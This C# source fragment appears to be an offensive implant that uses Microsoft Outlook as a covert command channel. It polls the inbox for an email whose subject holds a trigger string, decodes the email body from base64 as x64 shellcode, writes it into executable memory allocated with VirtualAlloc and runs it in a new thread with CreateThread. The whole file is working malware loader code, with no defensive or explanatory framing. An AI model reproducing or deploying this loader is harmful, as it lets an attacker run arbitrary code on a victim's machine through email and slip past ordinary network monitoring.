static void Main(string[] args)
{
string trigger = @"testtesttest2";
int pollingInterval = 10; // number of seconds to wait between polls
string body;
bool execed = false;
while (!execed)
{
var mails = OutlookEmails.ReadMailItems();
int i = 1;
foreach (dynamic mail in mails)
{
if (mail.EmailSubject.Contains(trigger))
{
body = mail.EmailBody;
body.Replace("\n", "");
byte[] x64shellcode = Convert.FromBase64String(body);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)x64shellcode.Length, 0x1000, 0x40);
Marshal.Copy(x64shellcode, 0, funcAddr, x64shellcode.Length);
IntPtr hThread = IntPtr.Zero;
uint threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
execed = true;
break;
}
i += 1;
}
if (!execed)
{
Console.WriteLine("No trigger found, trying again in 10 seconds");
Thread.Sleep(pollingInterval * 1000); // sleep for 10 seconds
}
}
while (Console.ReadKey().Key != ConsoleKey.Enter)
{
}
return;
}
public static List <OutlookEmails> ReadMailItems()
{
Application outlookApplication = null;
NameSpace outlookNamespace = null;
MAPIFolder inboxFolder = null;
Items mailItems = null;
List <OutlookEmails> listEmailDetails = new List <OutlookEmails>();
OutlookEmails emailDetails;
try
{
outlookApplication = new Application();
outlookNamespace = outlookApplication.GetNamespace("MAPI");
inboxFolder = outlookNamespace.GetDefaultFolder(OlDefaultFolders.olFolderInbox);
mailItems = inboxFolder.Items;
foreach (Object item in mailItems)
{
if (item is MailItem)
{
emailDetails = new OutlookEmails();
emailDetails.EmailFrom = ((MailItem)item).SenderEmailAddress;
emailDetails.EmailSubject = ((MailItem)item).Subject;
emailDetails.EmailBody = ((MailItem)item).Body;
listEmailDetails.Add(emailDetails);
ReleaseComObject(item);
}
}
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
ReleaseComObject(mailItems);
ReleaseComObject(inboxFolder);
ReleaseComObject(outlookNamespace);
ReleaseComObject(outlookApplication);
}
return(listEmailDetails);
}
